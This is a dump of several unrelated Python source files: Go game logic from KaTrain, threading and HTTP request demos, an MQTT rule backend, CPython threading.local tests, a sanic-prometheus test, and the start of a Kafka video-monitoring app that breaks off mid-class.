self.komi = self.root.komi
handicap = int(self.root.handicap)
num_starting_moves_black = 0
node = self.root
while node.children:
node = node.children[0]
if node.player == "B":
num_starting_moves_black += 1
else:
break
if (
handicap >= 2
and not self.root.placements
and not (num_starting_moves_black == handicap)
and not (self.root.children and self.root.children[0].placements)
): # not really according to sgf, and not sure if still needed, last clause for fox
self.root.place_handicap_stones(handicap)
else:
board_size = katrain.config("game/size")
rules = katrain.config("game/rules")
self.komi = katrain.config("game/komi")
self.root = GameNode(
properties={
**Game.DEFAULT_PROPERTIES,
**{"SZ": board_size, "KM": self.komi, "DT": self.game_id, "RU": rules},
**(game_properties or {}),
}
)
handicap = katrain.config("game/handicap")
if handicap:
self.root.place_handicap_stones(handicap)
if not self.root.get_property("RU"):
self.root.set_property("RU", katrain.config("game/rules"))
self.set_current_node(self.root)
self.main_time_used = 0
# restore shortcuts
shortcut_id_to_node = {node.get_property("KTSID", None): node for node in self.root.nodes_in_tree}
for node in self.root.nodes_in_tree:
shortcut_id = node.get_property("KTSF", None)
if shortcut_id and shortcut_id in shortcut_id_to_node:
shortcut_id_to_node[shortcut_id].add_shortcut(node)
threading.Thread(
target=lambda: self.analyze_all_nodes(-1_000_000, analyze_fast=analyze_fast, even_if_present=False),
daemon=True,
).start() # return faster, but bypass Kivy Clock
def analyze_all_nodes(self, priority=0, analyze_fast=False, even_if_present=True):
for node in self.root.nodes_in_tree:
# forced, or not present, or something went wrong in loading
if even_if_present or not node.analysis_from_sgf or not node.load_analysis():
node.clear_analysis()
node.analyze(self.engines[node.next_player], priority=priority, analyze_fast=analyze_fast)
# -- move tree functions --
def _calculate_groups(self):
board_size_x, board_size_y = self.board_size
with self._lock:
self.board = [
[-1 for _x in range(board_size_x)] for _y in range(board_size_y)
] # type: List[List[int]] # board pos -> chain id
self.chains = [] # type: List[List[Move]] # chain id -> chain
self.prisoners = [] # type: List[Move]
self.last_capture = [] # type: List[Move]
try:
for node in self.current_node.nodes_from_root:
for m in node.move_with_placements:
self._validate_move_and_update_chains(
m, True
) # ignore ko since we didn't know if it was forced
except IllegalMoveException as e:
raise Exception(f"Unexpected illegal move ({str(e)})")
def _validate_move_and_update_chains(self, move: Move, ignore_ko: bool):
board_size_x, board_size_y = self.board_size
def neighbours(moves):
return {
self.board[m.coords[1] + dy][m.coords[0] + dx]
for m in moves
for dy, dx in [(-1, 0), (1, 0), (0, -1), (0, 1)]
if 0 <= m.coords[0] + dx < board_size_x and 0 <= m.coords[1] + dy < board_size_y
}
ko_or_snapback = len(self.last_capture) == 1 and self.last_capture[0] == move
self.last_capture = []
if move.is_pass:
return
if self.board[move.coords[1]][move.coords[0]] != -1:
raise IllegalMoveException("Space occupied")
nb_chains = list({c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player == move.player})
if nb_chains:
this_chain = nb_chains[0]
self.board = [
[nb_chains[0] if sq in nb_chains else sq for sq in line] for line in self.board
] # merge chains connected by this move
for oc in nb_chains[1:]:
self.chains[nb_chains[0]] += self.chains[oc]
self.chains[oc] = []
self.chains[nb_chains[0]].append(move)
else:
this_chain = len(self.chains)
self.chains.append([move])
self.board[move.coords[1]][move.coords[0]] = this_chain
opp_nb_chains = {c for c in neighbours([move]) if c >= 0 and self.chains[c][0].player != move.player}
for c in opp_nb_chains:
if -1 not in neighbours(self.chains[c]):
self.last_capture += self.chains[c]
for om in self.chains[c]:
self.board[om.coords[1]][om.coords[0]] = -1
self.chains[c] = []
if ko_or_snapback and len(self.last_capture) == 1 and not ignore_ko:
raise IllegalMoveException("Ko")
self.prisoners += self.last_capture
if -1 not in neighbours(self.chains[this_chain]): # TODO: NZ rules?
raise IllegalMoveException("Suicide")
def set_insert_mode(self, mode):
if mode == "toggle":
mode = not self.insert_mode
if mode == self.insert_mode:
return
self.insert_mode = mode
if mode:
children = self.current_node.ordered_children
if not children:
self.insert_mode = False
else:
self.insert_after = self.current_node.ordered_children[0]
self.katrain.controls.set_status(i18n._("starting insert mode"), STATUS_INFO)
else:
copy_from_node = self.insert_after
copy_to_node = self.current_node
num_copied = 0
if copy_to_node != self.insert_after.parent:
above_insertion_root = self.insert_after.parent.nodes_from_root
already_inserted_moves = [
n.move for n in copy_to_node.nodes_from_root if n not in above_insertion_root and n.move
]
try:
while True:
if copy_from_node.move not in already_inserted_moves:
for m in copy_from_node.move_with_placements:
self._validate_move_and_update_chains(m, True)
# this inserts
copy_to_node = GameNode(
parent=copy_to_node, properties=copy.deepcopy(copy_from_node.properties)
)
num_copied += 1
if not copy_from_node.children:
break
copy_from_node = copy_from_node.ordered_children[0]
except IllegalMoveException:
pass # illegal move = stop
self._calculate_groups() # recalculate groups
self.katrain.controls.set_status(
i18n._("ending insert mode").format(num_copied=num_copied), STATUS_INFO
)
self.analyze_all_nodes(analyze_fast=True, even_if_present=False)
else:
self.katrain.controls.set_status("", STATUS_INFO)
self.katrain.controls.move_tree.insert_node = self.insert_after if self.insert_mode else None
self.katrain.controls.move_tree.redraw()
self.katrain.update_state(redraw_board=True)
# Play a Move from the current position, raise IllegalMoveException if invalid.
def play(self, move: Move, ignore_ko: bool = False, analyze=True):
board_size_x, board_size_y = self.board_size
if not move.is_pass and not (0 <= move.coords[0] < board_size_x and 0 <= move.coords[1] < board_size_y):
raise IllegalMoveException(f"Move {move} outside of board coordinates")
try:
self._validate_move_and_update_chains(move, ignore_ko)
except IllegalMoveException:
self._calculate_groups()
raise
with self._lock:
played_node = self.current_node.play(move)
self.current_node = played_node
if analyze:
if self.region_of_interest:
played_node.analyze(self.engines[played_node.next_player], analyze_fast=True)
played_node.analyze(self.engines[played_node.next_player], region_of_interest=self.region_of_interest)
else:
played_node.analyze(self.engines[played_node.next_player])
return played_node
def set_current_node(self, node):
if self.insert_mode:
self.katrain.controls.set_status(i18n._("finish inserting before navigating"), STATUS_ERROR)
return
self.current_node = node
self._calculate_groups()
def undo(self, n_times=1, stop_on_mistake=None):
# allow undo/delete only in insert mode
cn = self.current_node # avoid race conditions
if self.insert_mode: # in insert mode, undo = delete
if n_times == 1 and cn not in self.insert_after.nodes_from_root:
cn.parent.children = [c for c in cn.parent.children if c != cn]
self.current_node = cn.parent
self._calculate_groups()
return
break_on_branch = False
break_on_main_branch = False
last_branching_node = cn
if n_times == "branch":
n_times = 9999
break_on_branch = True
elif n_times == "main-branch":
n_times = 9999
break_on_main_branch = True
for move in range(n_times):
if (
stop_on_mistake is not None
and cn.points_lost is not None
and cn.points_lost >= stop_on_mistake
and self.katrain.players_info[cn.player].player_type != PLAYER_AI
):
self.set_current_node(cn.parent)
return
previous_cn = cn
if cn.shortcut_from:
cn = cn.shortcut_from
elif not cn.is_root:
cn = cn.parent
else:
break # root
if break_on_branch and len(cn.children) > 1:
break
elif break_on_main_branch and cn.ordered_children[0] != previous_cn: # implies > 1 child
last_branching_node = cn
if break_on_main_branch:
cn = last_branching_node
if cn is not self.current_node:
self.set_current_node(cn)
def redo(self, n_times=1, stop_on_mistake=None):
if self.insert_mode:
return
cn = self.current_node # avoid race conditions
for move in range(n_times):
if cn.children:
child = cn.ordered_children[0]
shortcut_to = [m for m, v in cn.shortcuts_to if child == v] # are we about to go to a shortcut node?
if shortcut_to:
child = shortcut_to[0]
cn = child
if (
move > 0
and stop_on_mistake is not None
and cn.points_lost is not None
and cn.points_lost >= stop_on_mistake
and self.katrain.players_info[cn.player].player_type != PLAYER_AI
):
self.set_current_node(cn.parent)
return
if stop_on_mistake is None:
self.set_current_node(cn)
def cycle_children(self, direction):
cn = self.current_node # avoid race conditions
if cn.parent and len(cn.parent.children) > 1:
ordered_children = cn.parent.ordered_children
ix = (ordered_children.index(cn) + len(ordered_children) + direction) % len(ordered_children)
self.set_current_node(ordered_children[ix])
@property
def board_size(self):
return self.root.board_size
@property
def stones(self):
with self._lock:
return sum(self.chains, [])
@property
def end_result(self):
if self.current_node.end_state:
return self.current_node.end_state
if self.current_node.parent and self.current_node.is_pass and self.current_node.parent.is_pass:
return self.manual_score or i18n._("board-game-end")
@property
def prisoner_count(
self,
) -> Dict: # returns prisoners that are of a certain colour as {B: black stones captures, W: white stones captures}
return {player: sum([m.player == player for m in self.prisoners]) for player in Move.PLAYERS}
@property
def manual_score(self):
rules = self.engines["B"].get_rules(self.root)
if not self.current_node.ownership or rules != "japanese":
if not self.current_node.score:
return None
self.katrain.log(
f"rules '{rules}' are not japanese, or no ownership available ({not self.current_node.ownership}) -> no manual score available",
OUTPUT_DEBUG,
)
return self.current_node.format_score(round(2 * self.current_node.score) / 2) + "?"
board_size_x, board_size_y = self.board_size
ownership_grid = var_to_grid(self.current_node.ownership, (board_size_x, board_size_y))
stones = {m.coords: m.player for m in self.stones}
lo_threshold = 0.15
hi_threshold = 0.85
max_unknown = 10
max_dame = 4 * (board_size_x + board_size_y)
def japanese_score_square(square, owner):
player = stones.get(square, None)
if (
(player == "B" and owner > hi_threshold)
or (player == "W" and owner < -hi_threshold)
or abs(owner) < lo_threshold
):
return 0 # dame or own stones
if player is None and abs(owner) >= hi_threshold:
return round(owner) # surrounded empty intersection
if (player == "B" and owner < -hi_threshold) or (player == "W" and owner > hi_threshold):
return 2 * round(owner) # captured stone
return math.nan # unknown!
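# Worked example (comment added for clarity, not in the original source): with
# the thresholds above, an empty point with ownership 0.9 scores +1 (Black
# territory), a White stone with ownership 0.9 scores +2 (a dead stone counts
# as territory plus capture), a Black stone with ownership 0.9 scores 0 (own
# living stone), |ownership| < 0.15 scores 0 (dame), and anything in between
# is NaN, i.e. unknown.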
scored_squares = [
japanese_score_square((x, y), ownership_grid[y][x])
for y in range(board_size_y)
for x in range(board_size_x)
]
num_sq = {t: sum([s == t for s in scored_squares]) for t in [-2, -1, 0, 1, 2]}
num_unkn = sum(math.isnan(s) for s in scored_squares)
prisoners = self.prisoner_count
score = sum([t * n for t, n in num_sq.items()]) + prisoners["W"] - prisoners["B"] - self.komi
self.katrain.log(
f"Manual Scoring: {num_sq} score by square with {num_unkn} unknown, {prisoners} captures, and {self.komi} komi -> score = {score}",
OUTPUT_DEBUG,
)
if num_unkn > max_unknown or (num_sq[0] - len(stones)) > max_dame:
return None
return self.current_node.format_score(score)
def __repr__(self):
return (
"\n".join("".join(self.chains[c][0].player if c >= 0 else "-" for c in line) for line in self.board)
+ f"\ncaptures: {self.prisoner_count}"
)
def update_root_properties(self):
def player_name(player_info):
if player_info.name and player_info.player_type == PLAYER_HUMAN:
return player_info.name
else:
return f"{i18n._(player_info.player_type)} ({i18n._(player_info.player_subtype)})"
root_properties = self.root.properties
x_properties = {}
for bw in "BW":
if not self.external_game:
x_properties["P" + bw] = player_name(self.katrain.players_info[bw]) + SGF_INTERNAL_COMMENTS_MARKER
player_info = self.katrain.players_info[bw]
if player_info.player_type == PLAYER_AI:
x_properties[bw + "R"] = rank_label(player_info.calculated_rank)
if "+" in str(self.end_result):
x_properties["RE"] = self.end_result
self.root.properties = {**root_properties, **{k: [v] for k, v in x_properties.items()}}
def generate_filename(self):
self.update_root_properties()
player_names = {
bw: re.sub(r"[\u200b\u3164'<>:\"/\\|?*]", "", self.root.get_property("P" + bw, bw)) for bw in "BW"
}
base_game_name = f"{PROGRAM_NAME}_{player_names['B']} vs {player_names['W']}"
return f"{base_game_name} {self.game_id}.sgf"
def write_sgf(self, filename: str, trainer_config: Optional[Dict] = None):
if trainer_config is None:
trainer_config = self.katrain.config("trainer", {})
save_feedback = trainer_config.get("save_feedback", False)
eval_thresholds = trainer_config["eval_thresholds"]
save_analysis = trainer_config.get("save_analysis", False)
self.update_root_properties()
show_dots_for = {
bw: trainer_config.get("eval_show_ai", True) or self.katrain.players_info[bw].human for bw in "BW"
}
sgf = self.root.sgf(
save_comments_player=show_dots_for,
save_comments_class=save_feedback,
eval_thresholds=eval_thresholds,
save_analysis=save_analysis,
)
self.sgf_filename = filename
os.makedirs(os.path.dirname(filename), exist_ok=True)
with open(filename, "w", encoding="utf-8") as f:
f.write(sgf)
return i18n._("sgf written").format(file_name=filename)
def set_region_of_interest(self, region_of_interest):
x1, x2, y1, y2 = region_of_interest
xmin, xmax = min(x1, x2), max(x1, x2)
ymin, ymax = min(y1, y2), max(y1, y2)
szx, szy = self.board_size
if not (xmin == xmax and ymin == ymax) and not (xmax - xmin + 1 >= szx and ymax - ymin + 1 >= szy):
self.region_of_interest = [xmin, xmax, ymin, ymax]
else:
self.region_of_interest = None
self.katrain.controls.set_status("", OUTPUT_INFO)
def analyze_extra(self, mode, **kwargs):
stones = {s.coords for s in self.stones}
cn = self.current_node
engine = self.engines[cn.next_player]
Clock.schedule_once(self.katrain.analysis_controls.hints.activate, 0)
if mode == "extra":
if kwargs.get("continuous", False):
visits = min(
1_000_000_000, max(engine.config["max_visits"], math.ceil(cn.analysis_visits_requested * 1.25))
)
else:
visits = cn.analysis_visits_requested + engine.config["max_visits"]
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
self.katrain.controls.set_status(i18n._("extra analysis").format(visits=visits), STATUS_ANALYSIS)
cn.analyze(
engine, visits=visits, priority=-1_000, region_of_interest=self.region_of_interest, time_limit=False
)
return
if mode == "game":
nodes = self.root.nodes_in_tree
if "visits" in kwargs:
visits = kwargs["visits"]
else:
min_visits = min(node.analysis_visits_requested for node in nodes)
visits = min_visits + engine.config["max_visits"]
for node in nodes:
node.analyze(engine, visits=visits, priority=-1_000_000, time_limit=False, report_every=None)
self.katrain.controls.set_status(i18n._("game re-analysis").format(visits=visits), STATUS_ANALYSIS)
return
elif mode == "sweep":
board_size_x, board_size_y = self.board_size
if cn.analysis_exists:
policy_grid = (
var_to_grid(self.current_node.policy, size=(board_size_x, board_size_y))
if self.current_node.policy
else None
)
analyze_moves = sorted(
[
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (policy_grid is None and (x, y) not in stones) or policy_grid[y][x] >= 0
],
key=lambda mv: -policy_grid[mv.coords[1]][mv.coords[0]],
)
else:
analyze_moves = [
Move(coords=(x, y), player=cn.next_player)
for x in range(board_size_x)
for y in range(board_size_y)
if (x, y) not in stones
]
visits = engine.config["fast_visits"]
self.katrain.controls.set_status(i18n._("sweep analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000_000_000
elif mode in ["equalize", "alternative", "local"]:
if not cn.analysis_complete and mode != "local":
self.katrain.controls.set_status(i18n._("wait-before-extra-analysis"), STATUS_INFO, self.current_node)
return
if mode == "alternative": # also do a quick update on current candidates so it doesn't look too weird
self.katrain.controls.set_status(i18n._("alternative analysis"), STATUS_ANALYSIS)
cn.analyze(engine, priority=-500, time_limit=False, find_alternatives="alternative")
visits = engine.config["fast_visits"]
else: # equalize
visits = max(d["visits"] for d in cn.analysis["moves"].values())
self.katrain.controls.set_status(i18n._("equalizing analysis").format(visits=visits), STATUS_ANALYSIS)
priority = -1_000
analyze_moves = [Move.from_gtp(gtp, player=cn.next_player) for gtp, _ in cn.analysis["moves"].items()]
else:
raise ValueError("Invalid analysis mode")
for move in analyze_moves:
if cn.analysis["moves"].get(move.gtp(), {"visits": 0})["visits"] < visits:
cn.analyze(
engine, priority=priority, visits=visits, refine_move=move, time_limit=False
) # explicitly requested so take as long as you need
def play_to_end(self):
cn = self.current_node
count = 0
if not cn.analysis_exists:
self.katrain.controls.set_status(i18n._("wait-before-extra-analysis"), STATUS_INFO, cn)
return
def analyze_and_play_policy(node):
nonlocal count, cn
cand = node.candidate_moves
if self.katrain.game is not self:
return # a new game happened
if cand:
move = Move.from_gtp(cand[0]["move"], player=node.next_player)
else:
polmoves = node.policy_ranking
move = polmoves[0][1] if polmoves else Move(None)
if move.is_pass:
if self.current_node == cn:
self.set_current_node(node)
return
count += 1
new_node = GameNode(parent=node, move=move)
if node != cn:
node.remove_shortcut()
cn.add_shortcut(new_node)
self.katrain.controls.move_tree.redraw_tree_trigger()
def set_analysis(result, _partial):
new_node.set_analysis(result)
analyze_and_play_policy(new_node)
self.engines[node.next_player].request_analysis(
new_node, callback=set_analysis, priority=-1000, analyze_fast=True
)
analyze_and_play_policy(cn)
def analyze_undo(self, node):
train_config = self.katrain.config("trainer")
move = node.move
if node != self.current_node or node.auto_undo is not None or not node.analysis_complete or not move:
return
points_lost = node.points_lost
thresholds = train_config["eval_thresholds"]
num_undo_prompts = train_config["num_undo_prompts"]
i = 0
while i < len(thresholds) and points_lost < thresholds[i]:
i += 1
num_undos = num_undo_prompts[i] if i < len(num_undo_prompts) else 0
if num_undos == 0:
undo = False
elif num_undos < 1: # probability
undo = int(node.undo_threshold < num_undos) and len(node.parent.children) == 1
else:
undo = len(node.parent.children) <= num_undos
node.auto_undo = undo
if undo:
self.undo(1)
self.katrain.controls.set_status(
i18n._("teaching undo message").format(move=move.gtp(), points_lost=points_lost), STATUS_TEACHING
)
self.katrain.update_state()
|
threading_accept_die.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 13:07:14 2018
@author: tensorflow-cuda
"""
import threading
def print_cube(num):
"""
function to print cube of given num
"""
print("Cube: {}".format(num * num * num))
def print_square(num):
"""
function to print square of given num
"""
print("Square: {}".format(num * num))
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(target=print_square, args=(10,))
t2 = threading.Thread(target=print_cube, args=(10,))
# starting thread 1
t1.start()
# starting thread 2
t2.start()
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
request_example.py
|
import multiprocessing
import requests
import sys
import threading
from timeit import Timer
import warnings
def request_item(item_id):
print("Thread {} starts ...".format(threading.currentThread().getName()))
try:
r = requests.get("http://hn.algolia.com/api/v1/items/{}".format(item_id))
except requests.RequestException as e:
warnings.warn(f"Request for {item_id} failed\n{e.message}")
#warnings.warn("Request for {item_id} failed\n{message}".format(item_id=item_id, message=e.message))
return None
print("Thread {} is completed.".format(threading.currentThread().getName()))
return r.json()
def request_sequential(id_min=1, id_max=21):
sys.stdout.write("Requesting sequentially...\n")
# get the metadata of all posts with an item_id ranging from 1 to 20
for item_id in range(id_min, id_max):
request_item(item_id)
sys.stdout.write("done.\n")
def request_concurrent(id_min=1, id_max=21):
sys.stdout.write("Requesting in parallel...\n")
jobs = []
for i in range(id_min, id_max):
thread = threading.Thread(name=i, target=request_item, args=(i, ))
jobs.append(thread)
thread.start()
print("Waiting for threads to finish execution.")
for j in jobs:
j.join()
sys.stdout.write("done.\n")
if __name__ == '__main__':
t = Timer(lambda: request_sequential())
print("Completed sequential in {} seconds.".format(t.timeit(1)))
print("--------------------------------------")
t = Timer(lambda: request_concurrent())
print("Completed using threads in {} seconds.".format(t.timeit(1)))
|
ruleBackend.py
|
import time
import paho.mqtt.client as mqtt
import signal
import sys
import threading
topics=[]
publisher=None
subscriber=None
connected=None
def disconnecthandler(mqc,userdata,rc):
print("Disconnected from broker")
global connected
connected = False
def init(host,port,user=None,password=None):
global publisher
publisher = Publisher(host,port,user,password)
global subscriber
subscriber = Subscriber(host,port,user,password)
def start():
subscriber.connect()
class Subscriber:
def __init__(self,host,port,user,pw):
self.clientid=None
self.mqc=None
self.host=host
self.port=port
self.user=user
self.pw=pw
self.topics=[]
self.handlers=[]
self.clientid="mqttRuleBackend-subscriber-"+ str(time.time())
def addTopic(self,topic,handler):
self.topics.append((topic,1))
self.handlers.append((topic,handler))
def connect(self):
self.mqc=mqtt.Client(client_id=self.clientid)
if self.user is not None and self.pw is not None:
self.mqc.username_pw_set(self.user,self.pw)
self.mqc.on_connect=self.connecthandler
self.mqc.on_disconnect=disconnecthandler
self.mqc.on_message=self.messagehandler
self.mqc.on_log=self.on_log
self.mqc.disconnected = True
self.mqc.connect(self.host,self.port,60)
self.mqc.loop_start()
global connected
connected = True
print("New client: "+self.clientid)
def messagehandler(self,mqc,userdata,msg):
payload=str(msg.payload.decode("utf-8"))
topic=str(msg.topic)
for t in self.handlers:
if t[0] == topic:
t[1](topic,payload)
def connecthandler(self,mqc,userdata,flags,rc):
self.mqc.subscribe(self.topics)
print("Subscribing to: "+str(self.topics))
    def on_log(self, client, userdata, level, buff):
print("log: ",buff)
class Publisher:
def __init__(self,host,port,user,pw):
self.host=host
self.port=port
self.user=user
self.pw=pw
self.clientid="mqttRuleBackend-publisher-"+ str(time.time())
print("New client: "+self.clientid)
self.mqc=mqtt.Client(client_id=self.clientid)
if self.user is not None and self.pw is not None:
self.mqc.username_pw_set(self.user,self.pw)
self.mqc.on_log=self.on_log
self.mqc.disconnected = True
self.mqc.on_disconnect=disconnecthandler
self.mqc.connect(self.host,self.port,60)
self.mqc.loop_start()
    def on_log(self, client, userdata, level, buff):
print("log: ",buff)
def send(self,topic,payload):
self.mqc.publish(topic,payload,qos=1,retain=False)
class Topic:
def __init__(self,rule,topic,react_on):
self.topic=topic
self.react_on=react_on
self.oldPayload=None
self.rule=rule
subscriber.addTopic(self.topic,self.messagehandler)
def messagehandler(self,topic,payload):
if self.react_on == "on_message":
self.executeRule(payload,topic)
else:
if self.react_on.startswith("on_payload:"):
                stripped=self.react_on[len("on_payload:"):]  # take the suffix; lstrip would strip characters, not the prefix
if payload == stripped:
self.executeRule(payload,topic)
else:
if self.react_on == "on_change":
if self.oldPayload is not None:
if self.oldPayload != payload:
self.executeRule(payload,topic)
self.oldPayload=payload
else:
self.oldPayload=payload
def executeRule(self,payload,topic):
try:
sbl=threading.Thread(target=self.rule,args=(payload,topic))
sbl.daemon = True
sbl.start()
except Exception as e:
print("Error when executing rule: "+str(e))
class State:
def __init__(self,topic):
self.topic=topic
self.state=""
subscriber.addTopic(self.topic,self.messagehandler)
def messagehandler(self,topic,payload):
self.state=payload
def on_log(client, userdata, level, buff):
print("log: ",buff)
def signal_handler(signal, frame):
print('Exiting ' + sys.argv[0])
global connected
connected = False
signal.signal(signal.SIGINT, signal_handler)
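
# --- Hedged usage sketch (not part of the original module) ---
# Shows how the pieces above appear intended to be wired together; the broker
# address, port, and topic names are assumptions for illustration only.
if __name__ == "__main__":
    def demo_rule(payload, topic):
        # Re-publish every change of the demo topic to a command topic.
        publisher.send("demo/cmd", payload)
    init("localhost", 1883)
    Topic(demo_rule, "demo/sensor", "on_change")
    start()
    while connected:
        time.sleep(1)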
|
test_threading_local.py
|
import sys
import unittest
from doctest import DocTestSuite
from test import support
from test.support import threading_helper
import weakref
import gc
# Modules under test
import _thread
import threading
import _threading_local
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class BaseLocalTest:
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = self._local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
gc.collect()
self.assertEqual(len(weaklist), n)
# XXX _threading_local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n))
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))
def test_derived(self):
# Issue 3088: if there is a threads switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(self._local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
with threading_helper.start_threads(threading.Thread(target=f, args=(i,))
for i in range(10)):
pass
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(self._local):
pass
locals = None
passed = False
e1 = threading.Event()
e2 = threading.Event()
def f():
nonlocal passed
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed)
def test_arguments(self):
# Issue 1522237
class MyLocal(self._local):
def __init__(self, *args, **kwargs):
pass
MyLocal(a=1)
MyLocal(1)
self.assertRaises(TypeError, self._local, a=1)
self.assertRaises(TypeError, self._local, 1)
def _test_one_class(self, c):
self._failed = "No error message set or cleared."
obj = c()
e1 = threading.Event()
e2 = threading.Event()
def f1():
obj.x = 'foo'
obj.y = 'bar'
del obj.y
e1.set()
e2.wait()
def f2():
try:
foo = obj.x
except AttributeError:
# This is expected -- we haven't set obj.x in this thread yet!
self._failed = "" # passed
else:
self._failed = ('Incorrectly got value %r from class %r\n' %
(foo, c))
sys.stderr.write(self._failed)
t1 = threading.Thread(target=f1)
t1.start()
e1.wait()
t2 = threading.Thread(target=f2)
t2.start()
t2.join()
# The test is done; just let t1 know it can exit, and wait for it.
e2.set()
t1.join()
self.assertFalse(self._failed, self._failed)
def test_threading_local(self):
self._test_one_class(self._local)
def test_threading_local_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_one_class(LocalSubclass)
def _test_dict_attribute(self, cls):
obj = cls()
obj.x = 5
self.assertEqual(obj.__dict__, {'x': 5})
with self.assertRaises(AttributeError):
obj.__dict__ = {}
with self.assertRaises(AttributeError):
del obj.__dict__
def test_dict_attribute(self):
self._test_dict_attribute(self._local)
def test_dict_attribute_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_dict_attribute(LocalSubclass)
def test_cycle_collection(self):
class X:
pass
x = X()
x.local = self._local()
x.local.x = x
wr = weakref.ref(x)
del x
gc.collect()
self.assertIsNone(wr())
class ThreadLocalTest(unittest.TestCase, BaseLocalTest):
_local = _thread._local
class PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):
_local = _threading_local.local
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadLocalTest))
suite.addTest(unittest.makeSuite(PyThreadingLocalTest))
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _thread._local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
support.run_unittest(suite)
if __name__ == '__main__':
test_main()
|
it_multiprocess.py
|
import re
import unittest
from time import sleep
from multiprocessing import Process
from urllib import request
from sanic import Sanic
from sanic.response import json
from sanic_prometheus import monitor, SanicPrometheusError
TEST_PORT = 54424
def launch_server():
app = Sanic('test_mp')
@app.route('/test')
async def test(request):
return json({'a': 'b'})
monitor(app).expose_endpoint()
app.run(port=TEST_PORT, workers=2)
class TestMultiprocessing(unittest.TestCase):
def setUp(self):
self._procs = []
def tearDown(self):
for p in self._procs:
p.terminate()
def test_start_server_should_not_work_with_mp(self):
app = Sanic('test_mp')
self.assertRaises(SanicPrometheusError, monitor(app).start_server)
def test_metrics_are_aggregated_between_workers(self):
p = Process(target=launch_server)
self._procs.append(p)
p.start()
sleep(1)
for _ in range(100):
r = request.urlopen("http://localhost:{}/test".format(TEST_PORT))
_ = r.read()
r = request.urlopen("http://localhost:{}/metrics".format(TEST_PORT))
nreqs = None
for l in r.readlines():
l = l.decode('ascii')
m = re.match(r"^sanic_request_count_total\{.+\}\s+(\d+)\s*", l)
if m:
nreqs = int(m.group(1))
break
self.assertIsNotNone(nreqs)
self.assertEqual(nreqs, 100)
|
monitoring_app_external_broker.py
|
import time
import wx
import cStringIO
from kafka import KafkaConsumer
import threading
import Queue
from datetime import datetime
#import simplejson
import pickle
local_consumer1 = KafkaConsumer('PhayaThai-1', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view1', consumer_timeout_ms = 300)
local_consumer2 = KafkaConsumer('PhayaThai-2', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view2', consumer_timeout_ms = 300)
local_consumer3 = KafkaConsumer('PhayaThai-3', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view3', consumer_timeout_ms = 300)
local_consumer4 = KafkaConsumer('PhayaThai-4', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view4', consumer_timeout_ms = 300)
local_consumer5 = KafkaConsumer('PhayaThai-5', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view5', consumer_timeout_ms = 300)
local_consumer6 = KafkaConsumer('PhayaThai-6', bootstrap_servers = ['192.168.1.7:9092'], group_id = 'view6', consumer_timeout_ms = 300)
local_consumer1.poll()
local_consumer2.poll()
local_consumer3.poll()
local_consumer4.poll()
local_consumer5.poll()
local_consumer6.poll()
local_consumer1.seek_to_end()
local_consumer2.seek_to_end()
local_consumer3.seek_to_end()
local_consumer4.seek_to_end()
local_consumer5.seek_to_end()
local_consumer6.seek_to_end()
my_queue1 = Queue.Queue()
my_queue2 = Queue.Queue()
my_queue3 = Queue.Queue()
my_queue4 = Queue.Queue()
my_queue5 = Queue.Queue()
my_queue6 = Queue.Queue()
start = time.time()
period_of_time = 120
latency_list_of_pi1 = []
latency_list_of_pi2 = []
latency_list_of_pi3 = []
latency_list_of_pi4 = []
latency_list_of_pi5 = []
latency_list_of_pi6 = []
unix_timestamp_of_pi1 = []
unix_timestamp_of_pi2 = []
unix_timestamp_of_pi3 = []
unix_timestamp_of_pi4 = []
unix_timestamp_of_pi5 = []
unix_timestamp_of_pi6 = []
image_list_pi1 = []
image_list_pi2 = []
image_list_pi3 = []
image_list_pi4 = []
image_list_pi5 = []
image_list_pi6 = []
class MyPanel(wx.Panel):
""""""
#----------------------------------------------------------------------
def __init__(self, parent):
wx.Panel.__init__(self, parent)
background_image = 'new_one_1920_1080.png'
